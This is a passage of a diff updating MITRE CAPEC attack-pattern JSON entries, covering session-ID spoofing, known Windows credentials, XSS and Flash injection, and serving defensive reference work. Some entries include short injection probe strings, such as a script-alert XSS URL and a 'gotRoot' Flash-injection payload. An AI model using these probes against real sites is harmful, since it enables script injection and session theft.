vulnerable to these attacks because the server to server communications have not been analyzed from a security perspective or the processes \"trust\" other systems because they are behind a firewall. Similarly, servers that use easy to guess or spoofable schemes for representing digital identity can also be vulnerable. Such systems frequently use schemes without cryptography and digital signatures (or with broken cryptography). Identifiers may be guessed or obtained due to insufficient randomness, poor protection (passed/stored in the clear), lack of integrity (unsigned), or improper correlation with access control policy enforcement points. Exposed configuration and properties files that contain sensitive data may additionally provide an adversary with the information needed to obtain these identifiers. An adversary may also \"ride\" an identifier via a malicious link, as is the case in Cross Site Request Forgery (CSRF) attacks.</xhtml:p>\n <xhtml:p>Regardless of the attack vector, successful spoofing and impersonation of trusted credentials can lead to an adversary breaking authentication, authorization, and audit controls with the target system or application.</xhtml:p>\n ",
"external_references": [
{
"source_name": "capec",
@@ -62,6 +62,12 @@
"url": "http://cwe.mitre.org/data/definitions/642.html",
"external_id": "CWE-642"
},
{
"source_name": "ATTACK",
"description": "Access Token Manipulation:Token Impersonation/Theft",
"url": "https://attack.mitre.org/wiki/Technique/T1134/001",
"external_id": "T1134.001"
},
{
"source_name": "reference_from_CAPEC",
"description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley",
@@ -76,7 +82,7 @@
"Access_Control": [
"Gain Privileges"
],
"Authorization": [
"Authentication": [
"Gain Privileges"
],
"Confidentiality": [
@@ -88,21 +94,25 @@
]
},
"x_capec_example_instances": [
"\n <xhtml:p>Thin client applications like web applications are particularly vulnerable to session ID attacks. Since the server has very little control over the client, but still must track sessions, data, and objects on the server side, cookies and other mechanisms have been used to pass the key to the session data between the client and server. When these session keys are compromised it is trivial for an attacker to impersonate a user's session in effect, have the same capabilities as the authorized user. There are two main ways for an attacker to exploit session IDs.</xhtml:p>\n <xhtml:p>A brute force attack involves an attacker repeatedly attempting to query the system with a spoofed session header in the HTTP request. A web server that uses a short session ID can be easily spoofed by trying many possible combinations so the parameters session-ID= 1234 has few possible combinations, and an attacker can retry several hundred or thousand request with little to no issue on their side.</xhtml:p>\n <xhtml:p>The second method is interception, where a tool such as wireshark is used to sniff the wire and pull off any unprotected session identifiers. The attacker can then use these variables and access the application.</xhtml:p>\n "
"\n <xhtml:p>Thin client applications like web applications are particularly vulnerable to session ID attacks. Since the server has very little control over the client, but still must track sessions, data, and objects on the server side, cookies and other mechanisms have been used to pass the key to the session data between the client and server. When these session keys are compromised it is trivial for an adversary to impersonate a user's session in effect, have the same capabilities as the authorized user. There are two main ways for an adversary to exploit session IDs.</xhtml:p>\n <xhtml:p>A brute force attack involves an adversary repeatedly attempting to query the system with a spoofed session header in the HTTP request. A web server that uses a short session ID can be easily spoofed by trying many possible combinations so the parameters session-ID= 1234 has few possible combinations, and an adversary can retry several hundred or thousand request with little to no issue on their side.</xhtml:p>\n <xhtml:p>The second method is interception, where a tool such as wireshark is used to sniff the wire and pull off any unprotected session identifiers. The adversary can then use these variables and access the application.</xhtml:p>\n "
],
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Survey the application for Indicators of Susceptibility: </b>Using a variety of methods, until one is found that applies to the target, the adversary probes for cookies, session tokens, or entry points that bypass identifiers altogether.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Spider all available pages</td></tr><tr><td>Attack known bad interfaces</td></tr><tr><td>Search outward-facing configuration and properties files for identifiers.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Fetch samples: </b>The adversary fetches many samples of identifiers. This may be through legitimate access (logging in, legitimate connections, etc.) or via systematic probing.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>An adversary makes many anonymous connections and records the session IDs assigned.</td></tr><tr><td>An adversary makes authorized connections and records the session tokens or credentials issued.</td></tr><tr><td>An adversary gains access to (legitimately or illegitimately) a nearby system (e.g., in the same operations network, DMZ, or local network) and makes a connection from it, attempting to gain the same privileges as a trusted system.</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Impersonate: </b>An adversary can use successful experiments or authentications to impersonate an authorized user or system or to laterally move within a system or application</p></li><li> <p> <b>Spoofing: </b>Malicious data can be injected into the target system or into a victim user's system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks.</p></li><li> <p> <b>Data Exfiltration: </b>The adversary can obtain sensitive data contained within the system or application.</p></li></ol></div>",
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"Server software must rely on weak session IDs proof and/or verification schemes"
"Server software must rely on weak identifier proof and/or verification schemes.",
"Identifiers must have long lifetimes and potential for reusability.",
"Server software must allow concurrent sessions to exist."
],
"x_capec_resources_required": [
"Ability to deploy software on network. Ability to communicate synchronously or asynchronously with server"
"Ability to deploy software on network.",
"Ability to communicate synchronously or asynchronously with server."
],
"x_capec_skills_required": {
"Low": "To achieve a direct connection with the weak or non-existent server session access control, and pose as an authorized user"
},
"x_capec_status": "Draft",
"x_capec_status": "Stable",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17.json
+8 -7
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--c15c7648-a7be-4a4a-863e-0d3e9be3eaa2",
"id": "bundle--e67b597d-9347-4ef2-94ea-f37ccb5ccd76",
"spec_version": "2.0",
"objects": [
{
@@ -8,9 +8,9 @@
"id": "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"name": "XML Oversized Payloads",
"description": "Applications often need to transform data in and out of the XML format by using an XML parser. It may be possible for an adversary to inject data that may have an adverse effect on the XML parser when it is being processed. By supplying oversized payloads in input vectors that will be processed by the XML parser, an adversary can cause the XML parser to consume more resources while processing, causing excessive memory consumption and CPU utilization, and potentially cause execution of arbitrary code. An adversary's goal is to leverage parser failure to his or her advantage. In many cases this type of an attack will result in a XML Denial of Service (XDoS) due to an application becoming unstable, freezing, or crashing. However it is possible to cause a crash resulting in arbitrary code execution, leading to a jump from the data plane to the control plane [R.231.1]. XDoS is most closely associated with web services, SOAP, and Rest, because remote service requesters can post malicious XML payloads to the service provider designed to exhaust the service provider's memory, CPU, and/or disk space. The main weakness in XDoS is that the service provider generally must inspect, parse, and validate the XML messages to determine routing, workflow, security considerations, and so on. It is exactly these inspection, parsing, and validation routines that XDoS targets. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Oversized Serialized Data Payloads",
"description": "Applications often need to transform data in and out of serialized data formats, such as XML and YAML, by using a data parser. It may be possible for an adversary to inject data that may have an adverse effect on the parser when it is being processed. By supplying oversized payloads in input vectors that will be processed by the parser, an adversary can cause the parser to consume more resources while processing, causing excessive memory consumption and CPU utilization, and potentially cause execution of arbitrary code. An adversary's goal is to leverage parser failure to their advantage. In many cases this type of an attack will result in an XML Denial of Service (XDoS) or similar Denial of Service (DoS) due to an application becoming unstable, freezing, or crashing. However it is possible to cause a crash resulting in arbitrary code execution, leading to a jump from the data plane to the control plane [REF-89]. DoS is most closely associated with web services, SOAP, and Rest, because remote service requesters can post malicious data payloads to the service provider designed to exhaust the service provider's memory, CPU, and/or disk space. The main weakness in serialized data related DoS is that the service provider generally must inspect, parse, and validate the data messages to determine routing, workflow, security considerations, and so on. It is exactly these inspection, parsing, and validation routines that DoS targets. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.",
"external_references": [
{
"source_name": "capec",
@@ -76,10 +76,11 @@
"Execute Unauthorized Commands"
]
},
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p>An adversary determines the input data stream that is being processed by an serialized data parser on the victim's side.</p></li></ol></div><div><h3>Experiment</h3><ol><li> <p>An adversary crafts input data that may have an adverse effect on the operation of the data parser when the data is parsed on the victim's system.</p></li></ol></div>",
"x_capec_likelihood_of_attack": "Medium",
"x_capec_prerequisites": [
"An application uses an XML parser to perform transformation on user-controllable data.",
"An application does not perform sufficient validation to ensure that user-controllable data is safe for an XML parser."
"An application uses an parser for serialized data to perform transformation on user-controllable data.",
"An application does not perform sufficient validation to ensure that user-controllable data is safe for a data parser."
],
"x_capec_skills_required": {
"High": "Arbitrary code execution",
@@ -87,7 +88,7 @@
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--25946b99-9827-40a6-99a4-ca15eea08e5d.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--9dfb06eb-d511-4d4b-ba41-2afc846a3c61",
"id": "bundle--7e5db4b4-72f9-471b-8d03-f04dbbbacd13",
"spec_version": "2.0",
"objects": [
{
@@ -43,7 +43,7 @@
},
"x_capec_status": "Stable",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--25aafa9d-84f2-4f9d-a19e-280e20bcd16c.json
+8 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--f175099f-67fc-44d0-95fa-8748a9dcfbf0",
"id": "bundle--7db9ac2e-b681-4d76-b054-73ba4ddff667",
"spec_version": "2.0",
"objects": [
{
@@ -22,6 +22,12 @@
"url": "http://cwe.mitre.org/data/definitions/200.html",
"external_id": "CWE-200"
},
{
"source_name": "ATTACK",
"description": "System Time Discovery",
"url": "https://attack.mitre.org/wiki/Technique/T1124",
"external_id": "T1124"
},
{
"source_name": "reference_from_CAPEC",
"description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill",
@@ -72,7 +78,7 @@
],
"x_capec_status": "Stable",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a.json
+115
View File
@@ -0,0 +1,115 @@
{
"type": "bundle",
"id": "bundle--1a145cf3-adb9-4942-b5a8-151aea3d4ea7",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2020-07-30T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Use of Known Windows Credentials",
"description": "An adversary guesses or obtains (i.e. steals or purchases) legitimate Windows domain credentials (e.g. userID/password) to achieve authentication and to perform authorized actions on the domain, under the guise of an authenticated user or service. Attacks leveraging trusted Windows credentials typically result in the adversary laterally moving within the local Windows network, since users are often allowed to login to systems/applications within the domain using their Windows domain password. This domain authentication can occur directly (user typing in their password or PIN) or via Single Sign-On (SSO) or cloud-based authentication, which often don't verify the authenticity of the user's input. Known credentials are usually obtained by an adversary via a system/application breach and/or by purchasing dumps of credentials on the dark web. These credentials may be further gleaned via exposed configuration and properties files that contain system passwords, database connection strings, and other sensitive data. Utilizing known Windows credentials, an adversary can obtain sensitive data from administrator shares, download/install malware on the system, pose as a legitimate user for social engineering purposes, and more. Ultimately, successful spoofing and impersonation of trusted credentials can lead to an adversary breaking authentication, authorization, and audit controls with the target system or application.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/653.html",
"external_id": "CAPEC-653"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/522.html",
"external_id": "CWE-522"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/307.html",
"external_id": "CWE-307"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/308.html",
"external_id": "CWE-308"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/309.html",
"external_id": "CWE-309"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/262.html",
"external_id": "CWE-262"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/263.html",
"external_id": "CWE-263"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/654.html",
"external_id": "CWE-654"
},
{
"source_name": "reference_from_CAPEC",
"description": "Dan Goodin, Attackers can use Zoom to steal users\u2019 Windows credentials with no warning, 2020--04---01, Ars Technica",
"url": "https://arstechnica.com/information-technology/2020/04/unpatched-zoom-bug-lets-attackers-steal-windows-credentials-with-no-warning/",
"external_id": "REF-575"
},
{
"source_name": "reference_from_CAPEC",
"description": "Jeff Warren, How Attackers are Stealing Your Credentials with Mimikatz, 2017--07---11, STEALTHbits Technologies, Inc.",
"url": "https://blog.stealthbits.com/how-attackers-are-stealing-your-credentials-with-mimikatz/",
"external_id": "REF-576"
}
],
"object_marking_refs": [
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
],
"x_capec_abstraction": "Standard",
"x_capec_consequences": {
"Access_Control": [
"Gain Privileges"
],
"Authentication": [
"Gain Privileges"
],
"Authorization": [
"Read Data"
],
"Confidentiality": [
"Gain Privileges",
"Read Data"
],
"Integrity": [
"Modify Data"
]
},
"x_capec_example_instances": [
"Adversaries exploited the Zoom video conferencing application during the 2020 COVID-19 pandemic to exfiltrate Windows domain credentials from a target system. The attack entailed sending Universal Naming Convention (UNC) paths within the Zoom chat window of an unprotected Zoom call. If the victim clicked on the link, their Windows usernames and the corresponding Net-NTLM-v2 hashes were sent to the address contained in the link. The adversary was then able to infiltrate and laterally move within the Windows domain by passing the acquired credentials to shared network resources. This further provided adversaries with access to Outlook servers and network storage devices. [REF-575]",
"Mimikatz, a post-exploitation Windows credential harvester, can be used to gather and exploit Windows credentials. This malware has been used in several known cyberattacks, such as the Petya Ransomeware attacks. [REF-576]"
],
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Acquire known Windows credentials: </b>The adversary must obtain known Windows credentials in order to access the target system, application, or service within the domain.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>An adversary purchases breached Windows username/password combinations or leaked hashed passwords from the dark web.</td></tr><tr><td>An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.</td></tr><tr><td>An adversary conducts a sniffing attack to steal Windows credentials as they are transmitted.</td></tr><tr><td>An adversary gains access to a Windows domain system/files and exfiltrates Windows password hashes.</td></tr><tr><td>An adversary examines outward-facing configuration and properties files to discover hardcoded Windows credentials.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Attempt domain authentication: </b>Try each Windows credential against various systems, applications, and services within the domain until the target grants access.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Manually or automatically enter each credential through the target's interface.</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Impersonate: </b>An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within the domain</p></li><li> <p> <b>Spoofing: </b>Malicious data can be injected into the target system or into other systems on the domain. The adversary can also pose as a legitimate domain user to perform social engineering attacks.</p></li><li> <p> <b>Data Exfiltration: </b>The adversary can obtain sensitive data contained within domain systems or applications.</p></li></ol></div>",
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"The system/application is connected to the Windows domain.",
"The system/application uses one factor password-based authentication, SSO, and/or cloud-based authentication.",
"The system/application does not have a sound password policy that is being enforced.",
"The system/application does not implement an effective password throttling mechanism.",
"The adversary possesses a list of known Windows user accounts and corresponding passwords that may exist on the target."
],
"x_capec_resources_required": [
"A list of known Windows credentials for the targeted domain.",
"A custom script that leverages a Windows credential list to launch an attack."
],
"x_capec_skills_required": {
"Low": "Once an adversary obtains a known Windows credential, leveraging it is trivial."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--27f34b27-52ae-42ae-a5c4-1155641eab90.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--ec15c1ed-b472-45c9-8826-7639736def57",
"id": "bundle--c950dea4-4cc7-49f2-b968-3bd70c536654",
"spec_version": "2.0",
"objects": [
{
@@ -40,7 +40,7 @@
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--283d665d-e109-4d5d-8993-6fb25e5923d6.json
+9 -3
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--970b1f00-2631-4943-8519-f3099d7c4ab8",
"id": "bundle--e8a34eeb-a18f-41fc-a5f1-13c521854550",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--283d665d-e109-4d5d-8993-6fb25e5923d6",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Local Code Inclusion",
"description": "The attacker forces an application to load arbitrary code files from the local machine. The attacker could use this to try to load old versions of library files that have known vulnerabilities, to load files that the attacker placed on the local machine during a prior attack, or to otherwise change the functionality of the targeted application in unexpected ways.",
"external_references": [
@@ -21,6 +21,12 @@
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/829.html",
"external_id": "CWE-829"
},
{
"source_name": "ATTACK",
"description": "Process Injection",
"url": "https://attack.mitre.org/wiki/Technique/T1055",
"external_id": "T1055"
}
],
"object_marking_refs": [
@@ -44,7 +50,7 @@
],
"x_capec_status": "Stable",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b.json
+4 -3
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--a64658e2-5436-4b74-9c6b-5476ef877497",
"id": "bundle--08ed96b9-2a7e-4f49-b15b-de03a8df957c",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "XSS Through HTTP Query Strings",
"description": "An adversary embeds malicious script code in the parameters of an HTTP query string and convinces a victim to submit the HTTP request that contains the query string to a vulnerable web application. The web application then procedes to use the values parameters without properly validation them first and generates the HTML code that will be executed by the victim's browser.",
"external_references": [
@@ -48,6 +48,7 @@
"http://user:host@example.com:8080/oradb<script>alert('Hi')</script>",
"\n <xhtml:p>Web applications that accept name value pairs in a HTTP Query string are inherently at risk to any value (or name for that matter) that an attacker would like to enter in the query string. This can be done manually via web browser or trivially scripted to post the query string to multiple sites. In the latter case, in the instance of many sites using similar infrastructure with predictable http queries being accepted and operated on (such as blogging software, Google applications, and so on), a single malicious payload can be scripted to target a wide variety of sites.</xhtml:p>\n <xhtml:p>Web 2.0 type sites like Technorati and del.icio.us rely on user generated content like tags to build http links that are displayed to other users. del.icio.us allows users to identify sites, tag them with metadata and provide URL, descriptions and more data. This data is then echoed back to any other web browser that is interested in the link. If the data is not validated by the del.icio.us site properly then an arbitrary code can be added into the standard http string sent to del.icio.us by the attacker, for example formatted as normal content with a URL and description and tagged as Java, and available to be clicked on (and executed by) any user browsing for Java content that clicks on this trojaned content.</xhtml:p>\n "
],
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Spider: </b>Using a browser or an automated tool, an attacker follows all public links on a web site. They record all the links they find.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.</td></tr><tr><td>Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.</td></tr><tr><td>Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Attempt variations on input parameters: </b>Possibly using an automated tool, an attacker requests variations on the URLs they spidered before. They send parameters that include variations of payloads. They record all the responses from the server that include unmodified versions of their script.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Use a list of XSS probe strings to inject in parameters of known URLs. If possible, the probe strings contain a unique identifier.</td></tr><tr><td>Use a proxy tool to record results of manual input of XSS probes in known URLs.</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Steal session IDs, credentials, page content, etc.: </b>As the attacker succeeds in exploiting the vulnerability, they can choose to steal user's credentials in order to reuse or to analyze them later on.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and sends document information to the attacker.</td></tr><tr><td>Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute appropriately.</td></tr></tbody></table><li> <p> <b>Forceful browsing: </b>When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user's current network (Internet or not).</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and performs actions on the same web site</td></tr><tr><td>Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities).</td></tr></tbody></table><li> <p> <b>Content spoofing: </b>By manipulating the content, the attacker targets the information that the user would like to get from the website.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and exposes attacker-modified invalid information to the user on the current web page.</td></tr></tbody></table></ol></div>",
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"Target client software must allow scripting such as JavaScript. Server software must allow display of remote generated HTML without sufficient input or output validation."
@@ -61,7 +62,7 @@
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--28be41f9-7246-4484-869d-f0e2e82690ee.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--68c30777-71d5-41dd-a310-11f02f551e65",
"id": "bundle--489df7ff-3bf6-4f4a-b713-df94b5ae396a",
"spec_version": "2.0",
"objects": [
{
@@ -23,7 +23,7 @@
],
"x_capec_abstraction": "Standard",
"x_capec_status": "Deprecated",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--29e8786c-a791-44c6-b1de-950cf0604643.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--baccbe37-cfb6-4869-b4c2-6c4774466ec8",
"id": "bundle--62487b2a-4039-4d8f-a74f-0daf4cb01b40",
"spec_version": "2.0",
"objects": [
{
@@ -41,7 +41,7 @@
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--2a6131f7-30af-4529-be4e-bc3b7bf22009.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--683aa28f-897e-48e9-b86d-be8e08a394cd",
"id": "bundle--f6cdd352-f716-459b-a06f-4e0ab288a460",
"spec_version": "2.0",
"objects": [
{
@@ -30,7 +30,7 @@
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--2a8824eb-4fd0-45a4-9c3c-af3fd7c5e0ca.json
+3 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--aa57cda6-bc94-49ba-a901-b288d92cea90",
"id": "bundle--e3c325cd-5243-4539-b91f-9b00f8ede0c9",
"spec_version": "2.0",
"objects": [
{
@@ -83,6 +83,7 @@
"x_capec_example_instances": [
"\n <xhtml:p>In the following example, the SWF file contains</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">getURL('javascript:SomeFunc(\"someValue\")','','GET')</xhtml:div>\n <xhtml:p>A request like</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">http://example.com/noundef.swf?a=0:0;alert('XSS')</xhtml:div>\n <xhtml:p>becomes</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">javascript:SomeFunc(\"someValue\")?a=0:0;alert(123)</xhtml:div>\n "
],
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Find Injection Entry Points: </b>The attacker first takes an inventory of the entry points of the application.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Spider the website for all available URLs that reference a Flash application.</td></tr><tr><td>List all uninitialized global variables (such as _root.*, _global.*, _level0.*) in ActionScript, registered global variables in included files, load variables to external movies.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Determine the application's susceptibility to Flash injection: </b>Determine the application's susceptibility to Flash injection. For each URL identified in the explore phase, the attacker attempts to use various techniques such as direct load asfunction, controlled evil page/host, Flash HTML injection, and DOM injection to determine whether the application is susceptible to Flash injection.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Test the page using direct load asfunction, getURL,javascript:gotRoot(\"\")///d.jpg</td></tr><tr><td>Test the page using controlled evil page/host, http://example.com/evil.swf</td></tr><tr><td>Test the page using Flash HTML injection, \"'><img src='asfunction:getURL,javascript:gotRoot(\"\")//.jpg' ></td></tr><tr><td>Test the page using DOM injection, (gotRoot(''))</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Inject malicious content into target: </b>Inject malicious content into target utilizing vulnerable injection vectors identified in the Experiment phase</p></li></ol></div>",
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"The target must be capable of running Flash applications. In some cases, the victim must follow an attacker-supplied link."
@@ -95,7 +96,7 @@
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--2a8a634e-cf1f-4b2e-9a71-1ab8e6bb16d0.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--91410eca-9947-4354-8198-081d1ee742be",
"id": "bundle--7c22cdd8-1e11-4ba5-9ce3-6833d950e7a5",
"spec_version": "2.0",
"objects": [
{
@@ -60,7 +60,7 @@
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--2b6e94c6-26d0-489c-989c-9f4307348c42.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--1acd1035-21e4-4c53-8b4d-0f79a422cd72",
"id": "bundle--562218fa-5233-43d2-922d-d99e88c9775d",
"spec_version": "2.0",
"objects": [
{
@@ -41,7 +41,7 @@
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b.json
+3 -3
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--d4e70f6a-fe79-4637-b183-b42704735ea6",
"id": "bundle--79008cad-2470-4af1-acca-13073f9a03ba",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Subvert Code-signing Facilities",
"description": "Many languages use code signing facilities to vouch for code's identity and to thus tie code to its assigned privileges within an environment. Subverting this mechanism can be instrumental in an attacker escalating privilege. Any means of subverting the way that a virtual machine enforces code signing classifies for this style of attack.",
"external_references": [
@@ -62,7 +62,7 @@
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Very High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--2c22407a-efdb-4b20-81f6-ab8a73ded348.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--a1a15ab1-b44f-43ef-9233-fbdd41cf403a",
"id": "bundle--05af55e2-efd4-4877-8b5b-4961d0cd63ff",
"spec_version": "2.0",
"objects": [
{
@@ -67,7 +67,7 @@
],
"x_capec_status": "Stable",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--58e3d023-7e15-4977-afaa-4612b4235ff0",
"id": "bundle--4513bb7f-d3ee-4617-94de-7c062d513d80",
"spec_version": "2.0",
"objects": [
{
@@ -50,7 +50,7 @@
],
"x_capec_status": "Stable",
